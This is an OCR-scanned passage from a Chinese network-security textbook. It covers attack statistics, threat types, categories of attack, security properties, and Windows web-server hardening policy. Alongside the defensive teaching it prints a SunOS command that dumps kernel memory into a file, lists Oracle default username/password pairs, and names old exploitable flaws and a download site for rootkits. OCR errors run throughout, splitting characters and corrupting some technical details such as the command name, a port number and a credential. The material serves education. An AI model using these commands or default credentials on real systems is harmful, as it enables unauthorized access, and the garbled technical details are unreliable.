。 ”2003 年 : 第 一 季度 为 42586 次 ， 预 计 全 年 将 达 170000 一 180000 次 。 

美国 21 世纪 国家 安全 委员 会 在 1999 年 发 表 的 《新 世纪 国家 安全 报告 》 中 ， 已 首次 将 
网 络 攻击 武器 定义 为 大 规模 破坏 性 武器 ， 并 将 其 与 专 指 核 、 生 化 武器 的 大 规模 毁灭 性 武器 
相提并论 。 


2. 国内 网 络 安全 事件 


近 几 年 来 ， 我 国 网 络 受 黑客 侵犯 事件 也 屡屡 发 生 ， 数 量 每 年 呈 明 显 上 升 趋势 ， 所 以 更 
应 加 强 对 网 络 安全 的 防护 。 

据 有 关 部 门 统计 ， 全 国 公 安 机 关 2002 年 共 受 理 各 类 信息 网 络 违法 犯罪 案件 6633 起 ， 
比 2001 年 增长 45.9%, 其 中 利用 计算 机 实施 的 违法 犯罪 案件 3301 起 , 占 案件 总 数 的 近 80%。 
如 1997 年 12 月 19 日 至 1999 年 8 月 18 日 有 人 先后 19 次 入 侵 某 证 券 公司 上 海 分 公司 的 
电脑 数据 库 ， 非 法 操作 股票 价格 ， 累 计 挪 用 金额 1290 万 元 ; 1999 年 4 月 16 日 ,黑客 入 侵 
中 亚信 托 投资 公司 上 海 某 证 券 营业 部 ， 造 成 340 万 元 的 损失 。 

中 国 的 银行 每 年 也 损失 数 亿 元 人 民 币 。 以 前 有 个 钓鱼 网 站 的 网 址 及 界面 都 与 某 正式 的 
银行 网 站 类 似 ， 如 图 1-3 所 示 。 
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图 1-3 某 钓 鱼网 站 的 页 面 
利用 计算 机 网 络 进行 的 各 类 违法 行为 在 中 国 以 每 年 30% 的 速度 递增 , 而 已 发 现 的 黑客 
攻击 案 只 占 总 数 的 30%。 
同时 , 网 络 安全 人 才 的 需求 暴涨 , 中 国 对 网 络 安全 人 才 的 需求 在 今后 几 年 内 将 超过 100 
万 ， 但 专业 的 网 络 与 信息 安全 机 构 在 国内 却 屈指 可 数 。 
网 络 信息 安全 已 经 初步 形成 一 个 产业 ， 根 据 权 威 职业 调查 机 构 的 预测 表明 ， 网 络 信息 
安全 人 才 必 将 成 为 信息 时 代 最 热门 的 抢手 人 才 。 
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1.2 网络 安全 威胁 


网 络 安全 威胁 是 指 对 网 络 信息 的 机 密 性 、 完 整 性 、 可 用 性 在 合法 使 用 时 可 能 造成 的 危 
害 。 主 要 有 以 下 几 个 方面 。 

1. 不 良 信息 的 入 侵 和 污染 

Intemet 是 一 个 开放 的 世界 ,很 多 国家 和 地 区 的 经 营 商 在 利益 的 驱动 下 , 开放 淫秽 网 站 ， 
大 量 制作 色情 网 页 。 

2. 计算 机 犯罪 


对 计算 机 及 网 络 的 攻击 活动 每 年 正在 以 10 倍 的 速度 增长 。 例如 : 破坏 程序 、 修改 网 页 、 
转移 金额 、 窃 取 密 码 、 进 行 电子 邮件 骚扰 、 阻 塞 用 户 等 。 


3. 网 络 病毒 

活体 病毒 已 达 50000 多 种 。 发 作 时 ， 计 算 机 系统 陷于 瘫痪 。 

4. 协议 安全 漏洞 

TCP/IP 协议 是 一 个 开放 式 协 议 ， 其 本 身 很 不 安全 。 黑 客 可 以 使 用 如 Sniffer、Tcpdump 


或 Snoop 等 类 似 软件 ， 看 到 一 台 计算 机 登录 到 另外 一 台 计 算 机 的 全 过 程 ， 同 时 可 以 获取 口 
令 和 明文 。 

5. 操作 系统 安全 漏洞 

Windows、UNIX 等 系统 都 存在 一 些 安全 漏洞 。 厂商 在 不 断 升级 系统 的 同时 也 在 生产 新 
的 bug。 操 作 系 统 厂商 不 时 发 布 一 些 补丁 程序 ， 但 新 的 程序 出 来 后 又 有 新 的 bug。 

公理 ( 摩 菲 定理 ): 所 有 的 程序 都 有 缺陷 。 

定理 (大 程序 定理 ): 大 程序 的 缺陷 甚至 比 它 包 含 的 内 容 还 多 。 

推论 : 一 个 安全 相关 程序 有 安全 性 缺陷 。 

1) UNIX 安全 漏洞 举例 

(1) Arm 命令 漏洞 。 受 影响 的 系统 : SunOS 4.1.x。 

$ arp -f/dev/kmem | string > mem 

运行 该 命令 后 , 会 把 当前 内 存 的 信息 写 入 当前 目录 下 的 mem 文件 , 通过 普通 的 文本 编 
辑 器 就 可 以 查看 内 存 的 情况 。 

(2) Sun 的 Java Web 服务 器 远程 命令 执行 漏洞 。 受 影响 的 系统 : Solaris、 使 用 Sun Java 
Web Server 的 所 有 版 本 的 系统 。 

Sun 的 Java Web 服务 器 默认 配置 存在 一 个 漏洞 .使 用 Java Web 服务 器 提供 的 公告 示例 
应 用 ， 就 有 可 能 在 目标 机 系统 上 远程 执行 任何 命令 。 
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2) Linux 安全 漏洞 

(1) RedHat Linux ping 缓冲 区 溢出 漏洞 。 受 影响 的 系统 : RedHat Linux 7.0、6.2。Ping 
命令 存在 两 处 缓冲 区 溢出 ， 本 地 用 户 有 可 能 利用 此 漏洞 获取 root 权限 。 

(2) Linux ls-w 参数 本 地 拒绝 服务 漏洞 。 受 影响 的 系统 : Linux RedHat 6.x、Linux 
Slackware 7.0。 

- 些 Linux 系统 中 的 ls 命令 包含 一 个 -w 选项 ， 它 可 以 用 来 定义 显示 屏幕 的 宽度 ， 同 时 
指定 一 个 很 大 的 宽度 数值 ， 通 过 循环 执行 多 次 相应 的 命令 ， 来 耗 尽 系统 内 存 。 

3) ”Windows XP 安全 漏洞 举例 

(1) Microsoft Windows 标准 输出 系统 崩溃 漏洞 。Windows NT/2000/XP 操作 系统 的 标 
准 输出 系统 存在 安全 漏洞 ， 通 过 发 送 特定 的 空格 序列 ， 可 能 导致 标准 输出 系统 崩溃 。 

(2) Windows XP 终端 服务 IP 欺骗 漏洞 。Windows 2000/XP 的 终端 服务 器 允许 远程 攻 
击 者 匿名 访问 该 服务 。 假 设 某 个 客户 端 位 于 路 由 器 的 后 面 ， 并 且 只 有 内 部 卫 地 址 ， 如 果 该 
客户 端 与 远程 终端 服务 器 建立 连接 的 话 ， 那 么 远程 的 终端 服务 器 就 会 记录 该 客户 端的 内 部 
他 地 址 ， 而 该 地 址 没有 什么 意义 。 

6. 网 络 硬件 设备 


由 于 网 络 技术 发 展 的 客观 原因 ， 路 由 器 等 网 络 设备 过 分 依赖 国外 产品 ， 从 而 埋 下 了 安 
全 隐患 。 

7. 数据 库 漏洞 

加 密 强度 不 够 ， 存 在 安全 漏洞 等 。 

例 1 Oracle home 环境 变量 缓存 区 溢出 漏洞 。 

受 影响 的 系统 ，Oracle 8.0、8.1.6、9.0.1 等 。 

当 Oracle_home 环境 包含 有 750bytes 或 更 多 的 时 候 ， 缓 存 区 溢出 。 

例 2 Oracle 包含 一 些 默认 用 户 / 口 令 组 合 : ScottTiger、Dbsnmp/Dbsnmp 、Systemy/ 
Manager 等 。 

例 3 可 以 用 TCP/IP 协议 从 15321 和 1526 端口 访问 Oracle 7.3 和 Oracle 8 等 数据 库 。 

8. 安全 管理 漏洞 

例如 : 路 由 器 配置 错误 ， 开 放 匿 名 FTP，TELNET， 口 令 文件 缺乏 安全 保护 ， 防 火 墙 
配置 不 正确 ， 操 作 失误 ， 缺 乏 安全 知识 等 。 

总 之 ， 在 没有 采取 防护 措施 的 网 络 中 ， 其 安全 漏洞 上 千 种 。 


1.3 网 络 攻 击 


1.3.1 潜在 的 对 手 
进行 网 络 攻击 的 潜在 对 手 有 以 下 几 种 。 
(1) 国家 : 组 织 精良 并 得 到 很 好 的 财政 资助 。 
(2) 黑客 : 攻击 网 络 和 系统 ， 企 图 探求 操作 系统 的 脆弱 性 或 其 他 缺陷 的 人 (能 解密 者 、 
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行为 不 良 者 、 旨 窃 者 、 电 话 黑 客 )。 
G) 计算 机 恐怖 分 子 ， 国内 外 代表 各 种 恐怖 分 子 或 极端 势力 的 个 人 或 团体 。 
(4) 有 组 织 犯罪 : 是 有 组 织 和 财政 资助 的 犯罪 团体 。 
(5) 其 他 犯罪 成 员 : 犯罪 群体 的 其 他 部 分 ， 单 独行 动 的 个 人 。 
(6) 国际 新 闻 : 收集 和 发 布 消息 ， 其 行为 包括 收集 关于 任何 人 和 事 的 情报 。 
(7) 商业 竞争 (工业 竞争 ): 在 竞争 市 场 中 的 国内 外 公司 或 集团 。 
(8) 不 满 的 雇员 : 对 公司 或 集团 不 满 的 人 ， 能 够 对 系统 实行 内 部 威胁 。 
(9) 不 小 心 或 未 受到 良好 训练 的 雇员 : 缺乏 训练 ， 操 作 失 误 ， 对 安全 认识 不 足 等 。 


1.3.2 攻击 的 种 类 

1. 被 动 攻击 

被 动 攻击 的 表现 包括 : 监视 网 络 上 的 信息 传送 ,包括 监视 明文 、 加 密 不 善 的 通信 数据 ; 
嗅 探 口令 等 进行 通信 量 分 析 ( 获 取 通 信 模 式 )。 

抵抗 : 使 用 VPN， 加 密 。 

2. 主动 攻击 

主动 攻击 是 指 企图 避 开 或 打破 安全 防护 , 引入 恶意 代码 以 及 转换 数据 或 系统 的 完整 性 。 

主动 攻击 主要 有 以 下 几 种 形式 。 

(1) 修改 传输 中 的 数据 : 像 在 电子 商务 领域 ， 电 子 交 易 被 修改 ， 如 改变 交易 的 数量 、 
将 交易 物品 或 货款 转移 到 别 的 帐户 。 

(2) 替换 : 插入 无 效 数据 ， 替 换 用 户 数据 。 

(3) 会 话 劫持 : 未 授权 使 用 一 个 已 经 建立 的 会 话 。 

(4) 伪装 成 授权 的 用 户 或 服务 器 : 通过 实施 嗅 探 或 其 他 手段 获得 用 户 / 管 理 员 信息 ， 然 
后 使 用 该 信息 作为 一 个 授权 用 户 登录 ， 同 样 可 对 服务 器 构成 威胁 。 

(5) 获取 系统 应 用 和 操作 系统 软件 ， 攻击 者 探求 运行 系统 权限 软件 中 的 脆弱 性 ， 如 
Windows 95 和 Windows NT 都 存在 许多 漏洞 。 

(6) 摆 取 主机 或 网 络 信任 : 攻击 者 通过 操作 文件 使 远方 主机 提供 服务 ， 从 而 抽取 传递 
信任 。 目 前 的 攻击 有 rhost 和 rlogin。 

(7) 获得 数据 执行 : 攻击 者 将 恶意 代码 植 入 看 起 来 无 害 的 供 下 载 的 软件 和 电子 邮件 中 ， 
从 而 使 用 户 去 执行 该 恶意 代码 ， 恶 意 代码 可 用 于 破坏 和 修改 文件 ， 特 别 是 包含 权限 参数 值 
的 文件 。 如 PostScript、Active- x 和 微软 的 Word 宏 病 毒 等 。 

(8) 恶意 代码 插入 并 刺探 : 通过 先前 发 现 的 漏洞 并 利用 该 漏洞 来 达到 攻击 。 例 如 : 使 
用 特洛伊 木马 ， 陷 门 ， 黑 客 工具 如 Rootkit(http://www.rootshell.com) 可 下 载 其 他 很 多 的 黑客 
工具 等 ，Rootkit 具有 总 控 钥 匙 能 力 ， 包 括 插入 脚本 ， 获 取 根 权限 。 

(9) 拒绝 服务 : 在 网 络 中 扩散 垃圾 包 以 及 向 邮件 中 心 扩 散 垃圾 邮件 等 。 
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3. 邻近 攻击 


邻近 攻击 是 指 未 授权 者 在 物理 上 接近 网 络 系统 或 设备 。 其 目的 是 修改 、 收 集 或 拒绝 访 
问 信息 ， 这 种 接近 可 以 是 秘密 进入 或 公开 接近 或 二 者 兼 有 。 

邻近 攻击 有 如 下 几 种 形式 。 

(1) 修改 数据 或 收集 信息 : 攻击 者 获取 了 对 系统 的 物理 访问 ， 如 卫 地 址 、 登 录 的 用 户 
名 和 口令 等 ， 从 而 修改 和 窃取 信息 。 

(2) 物理 破坏 : 获得 对 系统 的 网 络 访问 ， 导 致 对 系统 的 物理 破坏 。 


4. 内 部 人 员 攻击 


内 部 人 员 一 般 被 授权 在 信息 安全 处 理 系统 的 物理 范围 内 ， 通 常 对 信息 安全 处 理 系统 具 
有 直接 访问 权 , 常常 是 最 难 检测 和 防范 的 。 例 如 : 不 明 身 份 的 清洁 人 员 (下 班 后 的 物理 访问 )， 
授权 的 系统 用 户 和 恶意 的 系统 管理 员 。 

(1) 修改 数据 或 安全 机 制 : 攻击 者 常常 对 信息 具有 访问 权 ， 他 们 进行 未 授权 操作 或 破 
坏 数据 (他 们 知道 系统 布局 、 有 价值 的 数据 在 何 处 以 及 何 种 安全 防范 系统 在 工作 )。 

(2) 建立 未 授权 网 络 连接 : 对 机 密 网 络 具有 物理 访问 能 力 的 用 户 未 经 授权 连接 到 一 个 
低 机 密级 别 或 敏感 网 络 中 。 

(3) 秘密 通道 : 建立 未 授权 的 通信 路 径 ， 用 于 从 本 地 区 域 向 远程 传输 盗用 信息 。 

(4) 物理 损坏 或 破坏 : 攻击 者 赋予 的 物理 访问 权 。 

对 付 方法 :安全 意识 的 训练 ， 审 计 和 入 侵 检测 ， 关 键 数据 、 服 务 的 访问 控制 ， 强 身份 
识别 与 认证 。 

5. 分 发 攻击 

分 发 攻击 是 指 在 软件 和 硬件 开发 出 来 之 后 和 安装 之 前 这 段 时间 内 ， 当 它 从 一 个 地 方 传 
送 到 另 一 个 地 方 时 ， 攻 击 者 恶意 修改 软 硬 件 的 攻击 。 

(1) 在 制造 商 的 设备 上 修改 软 、 硬 件 : 在 生产 线 上 流通 时 ， 修 改 软 、 硬 件 配置 。 

(2) 在 产品 分 发 时 修改 软 、 硬 件 : 在 分 发 期 内 修改 软 、 硬 件 配 置 ， 如 在 装 船 时 安装 窃 
听 设 备 。 

对 付 方 法 : 在 产品 中 加 密 签名 ， 对 产品 严格 管理 等 。 

目前 所 知 的 黑客 攻击 方法 已 有 上 千 种 。 


1.4 网 络 安全 特点 及 属性 


1.4.1 网 络 安全 特点 

一 个 系统 是 否 安全 ， 依 赖 它 所 应 用 的 环境 、 目 的 以 及 外 在 的 威胁 等 多 种 因素 。 网 络 安 
全 问题 虽然 是 随 着 互联 网 的 发 展 出 现 的 ， 但 似乎 和 现实 安全 问题 一 样 ， 将 会 是 一 个 永恒 的 
问题 ， 因 为 其 具有 鲜明 的 特性 。 
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1. 攻击 与 防守 的 不 对 称 性 


实施 网 络 安全 威胁 的 攻击 者 ， 通 常会 突破 网 络 默认 的 规则 ， 利 用 攻击 工具 或 系统 、 应 
用 软件 以 及 协议 上 的 漏洞 ， 或 者 通过 勾结 内 部 人 员 等 达到 攻击 目的 。 

攻击 是 有 备 而 来 的 ， 在 当前 的 网 络 环境 下 ， 攻 击 工具 较 容 易 获 得 ， 攻 击 风险 低 、 追 踪 
难 。 对 于 防卫 人 员 来 说 ， 则 恰恰 相反 ， 意 味 着 必须 堵 住 所 有 可 能 的 漏洞 ， 否 则 整个 防御 就 
可 能 毁 于 一 旦 。 

如 果 把 安全 问题 比 作 一 段 链条 ， 最 脆弱 的 一 环 可 以 使 整个 链条 断裂 。 不 断 增加 的 网 络 
杂 性 使 得 安全 防护 的 难度 日 益 增 大 ，100% 的 绝对 安全 的 网 络 根本 难以 做 到 。 

攻击 可 以 攻 其 一 点 ， 防 守 却 要 全 面 防御 。 受 到 攻击 几乎 是 必然 的 ， 而 保证 安全 却 是 相 
对 的 。 很 多 攻击 者 具有 专业 知识 和 经 验 ， 而 大 部 分 用 户 却 只 会 基础 应 用 ， 这 是 很 不 对 称 的 。 

2. 网 络 安全 的 动态 特性 

网 络 安全 威胁 是 变化 的 。 无 论 我 们 采取 了 多 么 先进 的 技术 来 进行 安全 防范 ， 但 随 着 时 
间 的 推移 ， 操 作 系 统 、 硬 件 平台 、 应 用 软件 、 网 络 协议 等 都 会 不 断 更 新 ， 在 这 个 过 程 中 ， 
原来 存在 的 一 系列 安全 问题 都 发 生 着 变化 ， 如 旧 的 漏洞 可 能 不 存在 或 者 不 重要 了 ， 但 新 的 
漏洞 又 出 现 了 。 为 了 应 付 新 的 安全 风险 ， 网 络 安全 防范 也 永远 处 于 动态 之 中 ， 因 此 ， 不 可 
能 存在 一 劳 永 逸 的 技术 或 解决 方案 。 这 就 是 所 谓 的 “ 道 高 一 尺 ， 魔 高 一 丈 ”。 

3. 攻击 与 防御 的 经 济 性 问题 


在 网 络 安全 方面 ， 投 入 的 代价 既 可 能 是 资金 、 人 力 ， 也 可 能 是 时 间 、 易 用 性 。 

网 络 安全 在 很 大 程度 依赖 于 投入 ， 为 了 让 信息 系统 更 安全 ， 可 能 需要 使 用 很 多 安全 设 
备 和 技术 ， 雇 用 许多 安全 专业 人 员 ， 所 以 ， 拥 有 的 资源 越 多 ， 就 越 可 能 达到 更 好 的 安全 
程度 。 

但 这 里 就 有 一 个 矛盾 : 假设 要 保护 的 资产 价值 为 M， 而 安全 投入 为 m， 如 果 m<M， 那 
么 安全 投入 是 有 意义 的 ， 而 如 果 m>M， 或 者 m 接近 M， 则 安全 投入 就 失去 了 意义 。 同 样 ， 
这 个 矛盾 对 于 攻击 者 也 存在 ， 攻 击 的 代价 如 果 超 过 了 攻击 者 的 获 益 ， 也 是 没有 意义 的 。 

并 且 ， 信 息 服务 的 本 质 是 开放 性 的 ， 或 者 是 部 分 开放 的 ， 或 者 是 完全 开放 的 。 例 如 : 
提供 检索 的 搜索 引擎 、 新 闻 网 站 、 各 种 公共 信息 网 站 是 面向 所 有 用 户 的 ; 企业 信息 是 针对 
部 分 对 象 ， 如 企业 与 企业 之 间 ， 企 业 与 用 户 之 间 、 企 业 与 内 部 职员 之 问 等 。 而 采取 各 种 网 
络 防范 措施 就 意味 着 限制 这 种 开放 性 ， 必 然 给 使 用 带 来 不 便 。 

一 般 情 况 下 ， 谁 拥有 的 资源 (技术 能 力 、 专 业 人 员 等 ) 更 多 ， 谁 就 更 有 可 能 占 上 风 ， 但 
很 多 时 候 却 相反 ， 系 统 越 复杂 ， 漏 洞 也 越 多 ， 实 施 的 网 络 攻击 更 容易 奏效 。 因 此 ， 以 合理 
的 代价 达到 一 定 程度 的 网 络 安全 是 网 络 安全 策略 的 出 发 点 。 

从 这 个 意义 上 来 讲 ， 各 种 网 络 安全 技术 及 措施 的 目的 是 使 得 攻击 的 成 本 加 大 ， 从 而 增 
强 用 户 的 安全 感 ， 并 且 不 至 于 使 系统 太 繁 琐 而 难以 使 用 。 


4. 人 是 网 络 安全 问题 的 核心 


实际 上 ， 不 管 我 们 采取 怎样 的 安全 防护 技术 ， 最 根本 的 还 是 人 ， 安 全 问题 的 根源 在 于 
人 性 的 弱点 ， 不 论 是 攻击 者 还 是 防卫 者 。 
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攻击 者 的 动机 包括 获取 利益 、 好 奇 心 、 出 名 、 发 泄 、 政 治 或 军事 等 原因 ， 这 些 动机 和 
导致 社会 问题 的 动机 是 一 样 的 。 

而 对 于 防卫 者 来 说 ， 弱 点 则 是 麻痹 和 懒惰 。 每 当 一 场 危机 来 临 的 时 候 ， 如 潜水、 瘟疫 
发 生 时 ， 人 们 的 安全 意识 会 很 快 上 升 ， 甚 至 会 达到 风声 鹤 噢 、 草 木 皆 兵 的 程度 ， 遗 憾 的 是 ， 
危机 一 过 ， 人 们 很 快 就 会 恢复 到 常态 ， 直 到 下 次 危机 才 又 被 唤醒 。 

网 络 安全 也 一 样 ， 可 以 预料 ， 只 要 人 性 的 弱点 存在 ， 不 管 安全 技术 如 何 发 展 ， 安 全 问 
题 总 是 存在 并 不 断 变 化 的 。 唯 一 能 够 确定 的 是 ， 永远 没有 100% 的 网 络 安全 。 既 然 如 此 , 我 
们 为 什么 还 要 讨论 网 络 安全 技术 呢 ? 

现实 社会 中 虽然 有 假 钞 ， 信 用 卡 也 会 被 偷窃 ， 但 人 们 仍然 在 大 量 使 用 ， 这 是 因为 技术 
进步 带 来 的 方便 程度 超过 了 可 能 的 损失 。 人 们 会 在 家 里 安装 防盗 门 、 保 险 柜 等 ， 虽 然 不 能 
万 无 一 失 ， 但 大 部 分 情况 下 仍 能 起 作用 ， 并 给 人 们 带 来 安全 感 。 

因此 ， 通 过 网 络 安全 技术 管理 手段 ， 最 大 限度 地 减少 风险 ， 增 加 攻击 者 的 成 本 ， 给 用 
户 带 来 安全 感 ， 并 使 正常 的 交易 、 业 务 能 够 进行 下 去 ， 就 是 网 络 安全 防御 的 目标 。 

从 被 保护 对 象 的 角度 来 说 ， 安 全 没有 绝对 的 、 统 一 的 标准 ， 因 为 每 个 人 的 利益 是 不 同 
的 ， 每 个 组 织 或 单位 的 利益 也 是 不 同 的。 一 个 系统 是 否 安全 ， 取 决 于 它 所 采取 的 安全 措施 
是 否 实现 了 既定 的 安全 政策 (Security Policy)。 

网 络 安全 更 多 地 被 作为 一 个 技术 问题 来 研究 , 但 是 不 管 这 种 技术 看 起 来 是 多 么 的 完善 ， 
必须 要 有 人 的 参与 ， 配 合 以 良好 的 安全 管理 措施 ， 才 能 够 较 好 的 发 挥 作用 ， 因 此 ， 建 立 安 
全 意识 ， 强 化 管理 更 为 重要 。 


1.4.2 安全 属性 


保密 性 /机 密 性 : 信息 的 内 容 不 被 未 授权 的 人 获取 。 

数据 完整 性 : 数据 传输 或 存储 过 程 中 不 被 未 授权 的 算 改 或 破坏 。 

可 用 性 : 即便 是 在 故障 或 受 攻击 时 也 能 提供 有 效 的 服务 。 

真实 性 : 通信 方 的 身份 ， 消 息 的 来 源 。 

授权 与 访问 控制 : 合法 的 用 户 有 不 同 的 访问 权限 。 

抗 抵赖 /不 可 否认: 交易 双方 任何 人 不 能 否定 已 经 发 生 的 交易 。 

可 追查 性 : 可 以 追踪 到 消息 的 来 源 (责任 人 )。 

可 生存 性 / 抗 毁 性 : 在 部 分 被 摧毁 的 情况 下 ， 其 余 的 部 分 还 能 够 维持 运转 。 
私密 性 /隐私 : 个 人 的 隐私 信息 ， 比 如 上 网 记录 。 

可 控 性 : 不 良 信息 的 屏蔽 。 


1.4.3 如何 实现 网 络 安全 


1. 什么 是 安全 政策 


安全 政策 或 称 安全 策略 是 一 个 组 织 为 了 实现 其 业务 目标 而 制定 的 一 组 规定 ， 用 来 规范 
用 户 的 行为 ， 指 导 信息 资源 的 保护 和 管理 。 

安全 政策 应 该 表现 为 一 份 或 一 系列 正式 的 文档 。 

安全 政策 规定 了 用 户 什么 是 该 做 的 ， 什 么 是 不 该 做 的 。 
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2. 安全 策略 举例 


1) ”Web 服务 器 系统 安全 策略 

无 论 Intemet 或 者 Intranet， 它 的 核心 是 Web 服务 器 。 管 理 好 、 使 用 好 、 保 护 好 Web 
服务 器 中 的 资源 ， 是 网 管 人 员 的 重要 职责 。 如 果 出 现 问 题 ， 就 会 造成 不 可 弥补 的 损失 ， 因 
此 ， 根 据 开 发 和 维护 Web 服务 器 的 过 程 ， 制 定 、 实 施 安全 策略 如 下 。 

(1) 系统 安装 的 安全 策略 。 

目前 ，Web 服务 器 大 多 采用 Windows 平台 ， 对 Windows 系统 进行 管理 是 一 个 日 积 月 
累 、 不 断 完善 的 过 程 。 

@ ”安装 系统 时 ， 不 要 把 系统 安装 在 默认 目录 下 ， 也 不 要 安装 多 余 的 服务 和 多 余 的 协 
议 ， 因 为 有 的 服务 存在 漏洞 ， 多 余 的 协议 会 占用 资源 ， 因 此 ， 无 用 的 服务 和 协议 不 要 安装 。 
安装 Windows 补丁 。 
安装 防 病毒 软件 。 
选择 合适 的 网 卡 驱动 和 显示 器 驱动 程序 。 
系统 安全 策略 的 配置 。 
限制 匿名 访问 本 机 用 户 。 
限制 远程 用 户 对 光驱 或 软驱 的 访问 。 
限制 远程 用 户 对 NetMeeting 的 共享 ,禁用 NetMeeting 的 远程 桌面 共享 功能 , 用 户 
就 不 能 利用 NetMeeting 控制 该 计算 机 。 

图 限制 用 户 执行 Windows 安装 任务 。 这 个 策略 可 以 防止 用 户 在 系统 上 安装 软件 。 

(3) IIS 安全 策略 的 应 用 。 

在 配置 Internet 信息 服务 GIS) 时 ， 应 该 进行 以 下 工作 。 

一 般 不 使 用 默认 的 Web 站 点 ， 避 免 外 界 对 网 站 的 攻击 ， 有 具体 做 法 是 : 

@ 停止 默认 的 Web 站 点 

@ 建立 新 的 Web 站 点 

图 ”完成 新 建 的 Web 站 点 以 后 ， 要 对 该 站 点 主 目录 权限 进行 设置 。 一 般 情 况 下 设置 与 
SYSTEM 和 Administrator 两 个 用 户 可 完全 控制 。 

(4) 审核 日 志 策略 的 配置 。 

当 Windows 系统 出 现 问题 的 时 候 ， 首 先 应 该 查看 系统 日 志 ， 通 过 对 系统 日 志 的 分 析 ， 
可 以 了 解 故障 发 生前 系统 的 运行 情况 ， 作 为 判断 故障 原因 的 根据 。 

Windows 的 日 志 系统 在 默认 安装 下 ， 安 全 审核 是 关闭 的 。 一 般 情况 下 需要 对 常用 的 3 
种 日 志 进 行 配置 。 

@ 设置 登录 审核 日 志 。 

如 果 对 登录 事件 进行 审核 ， 那 么 每 次 用 户 在 计算 机 上 登录 或 注销 时 ， 都 会 在 安全 日 志 
中 生成 一 个 事件 。 可 以 使 用 事件 ID 对 登录 情况 进行 判断 。 

@ 设置 HTTP 审核 日 志 。 

。 设置 日 志 的 属性 。 

。 ”更 改 日 志 的 存放 路 径 。 

http 审核 日 志 的 默认 位 置 在 安装 目录 的 \system32\LogFiles 下 。 更 改 日 志 的 存放 路 径 可 


sd 
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以 加 强 日 志 自 身 的 安全 性 。 

图 设置 FTP 审核 日 志 。 

2) Web 服务 器 的 维护 策略 

Web 服务 器 上 的 内 容 。 经 常 要 按照 需求 进行 修改 ， 维 护 工作 相当 频繁 。 因 此 ， 要 制定 
完善 的 维护 策略 ， 才 能 保证 Web 服务 器 的 安全 。 

(1) 设置 administrator 用 户口 令 。 

对 administrator 设置 较 复杂 的 口令 ， 以 防止 外 界 的 口令 攻击 。 为 避免 网 管 人 员 忘 记 口 
令 , 除了 修改 后 及 时 记录 口令 外 , 还 可 以 另外 建立 一 个 具有 Administrator 特权 的 管理 用 户 ， 
起 一 个 比较 生僻 的 用 户 名 。 设 置 一 个 自己 容易 记忆 的 口令 。 这 样 ， 就 可 以 对 其 他 用 户 进行 
维护 ， 包 括 口令 修改 等 。 

(2) 网 页 发 布 和 下 载 的 安全 策略 。 

- 般 情况 下 ， 一 台 Web 服务 器 上 安装 有 几 个 部 门 的 网 页 ， 并 由 各 部 门 自己 维护 。 多 数 

网 管 人 员 采 用 共享 目录 的 方法 让 各 部 门 进行 网 页 的 下 载 和 发 布 ， 这 种 方法 很 不 安全 。 因 此 ， 
在 Web 服务 器 上 ， 要 取消 所 有 的 共享 目录 ， 避 免 其 他 没有 授权 的 计算 机 通过 共享 目录 查看 
或 删除 重要 的 数据 和 文件 。 

@ 网 页 的 更 新 采用 FTP 方法 进行 ， 不 仅 可 以 使 各 部 门 维护 人 员 之 间 的 网 页 和 数据 互 
相 独 立 ， 而 且 比 共享 目录 更 直观 和 方便 。 

@ ”FTP 安全 策略 设置 。 

@ 在 服务 器 上 添加 FTP 的 下 地址 。 

@ 在 服务 器 上 添加 用 户 。 

@ 在 服务 器 上 为 某 部 门 的 网 页 维护 人 员 添 加 用 户 。 

(3) 网 页 维护 策略 。 

根据 用 户 要 求 。 软 件 下 载 功能 经 常 需要 更 新 ， 其 更 新 维护 策略 如 下 。 

@ 不 要 直接 修改 Web 服务 器 上 的 内 容 ， 先 在 自己 的 机 器 上 进行 修改 。 按 照 要 求 修改 
本 xz.htm 网 页 ， 连 接 增 加 的 下 载 内 容 。 

@ 通过 ftp， 即 可 看 到 Web 服务 器 上 download 目录 中 的 内 容 。 

@ ”把 本 机 上 修改 过 的 网 页 和 要 下 载 的 内 容 复制 到 download 目录 下 。 

@ 查询 试验 ， 用 浏览 器 打开 网 页 进行 查看 ， 观 察 运行 结果 是 否 正常 。 

@ 为 了 安全 ， 使 用 完 后 ， 要 在 正 浏览 器 属性 中 ， 清 除 历 史记 录 。 

为 保证 Web 服务 器 的 安全 ， 不 仅 要 综合 应 用 各 种 安全 策略 ， 还 要 采取 其 他 安全 措施 
如 在 系统 安全 方面 ， 建 立 系统 盘 的 镜像 备份 ， 建 立 详细 文档 资料 ;在 应 用 安全 方面 ， 修改 
数据 库 默 认 扩展 名 ， 使 用 虚拟 目录 而 不 使 用 实际 目录 ， 如 制定 聊天 室 的 安全 策略 等 。 


1.5 网络 安全 技术 


1.5.1 网 络 安全 基本 要 素 


。 ”双向 身份 认证 : 双方 通信 前 证 明 对 方 的 身份 与 其 声明 的 一 致 ， 建 立 带 有 一 定 保障 
级 别 的 实体 身份 。 


EE 
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访问 控制 授权 : 对 不 同 用 户 设置 不 同 的 存 取 权限 ， 把 证 实 的 实体 与 存 取 控 制 机 制 
匹配 ， 保 证 只 允许 访问 授权 资源 。 

加 密 算法 : 通过 加 密 算法 可 将 数据 转化 为 男 一 种 形式 ， 不 具有 密 钥 的 人 不 能 解读 
数据 ， 这 是 信息 安全 的 核心 内 容 。 

完整 性 检测 :确保 信息 在 传输 过 程 中 不 被 算 改 ， 包 括 变动 、 插 入 、 删 除 、 复 制 等 
以 及 序列 号 不 被 改变 和 重 置 。 

不 可 否认 性 : 证 明 一 条 消息 已 被 发 送 和 接收 ， 保 证 发 送 方 和 接收 方 都 有 能 力 证 明 
接收 和 发 送 操作 确实 发 生 了 ， 并 能 确定 发 送 和 接收 者 的 身份 ， 数 字 签 名 的 认证 特 
性 ， 可 以 提供 不 可 否认 性 。 

可 靠 性 保护 : 通信 内 容 不 被 他 人 捕获 ， 不 会 有 敏感 信息 泄漏 ， 这 主要 通过 数据 传 
输 加 密 技术 实现 。 

数据 隔离 ， 防 止 数据 泄漏 ， 不 允许 秘密 的 数据 流入 到 非 机 密 网 络 中 ， 例 如 : 利用 
路 由 器 来 控制 安全 标记 ， 转 发 P 包 ， 利 用 防火 墙 扫描 E-mail 消息 中 的 关键 词 ， 
防止 其 释放 到 局 域 网 中 等 。 


信息 安全 技术 


身份 识别 与 认证 技术 。 防 止 用 户 、 服 务 器 、 计 算 机 之 间 的 欺骗 和 抵赖 。 
数据 加 密 技术 。 防 止 被 非法 窃取 。 

数字 签名 技术 。 防 止 信息 被 假冒 、 算 改 和 抵赖 。 

访问 控制 技术 。 防 止 用 户 越权 访问 数据 和 使 用 资源 。 

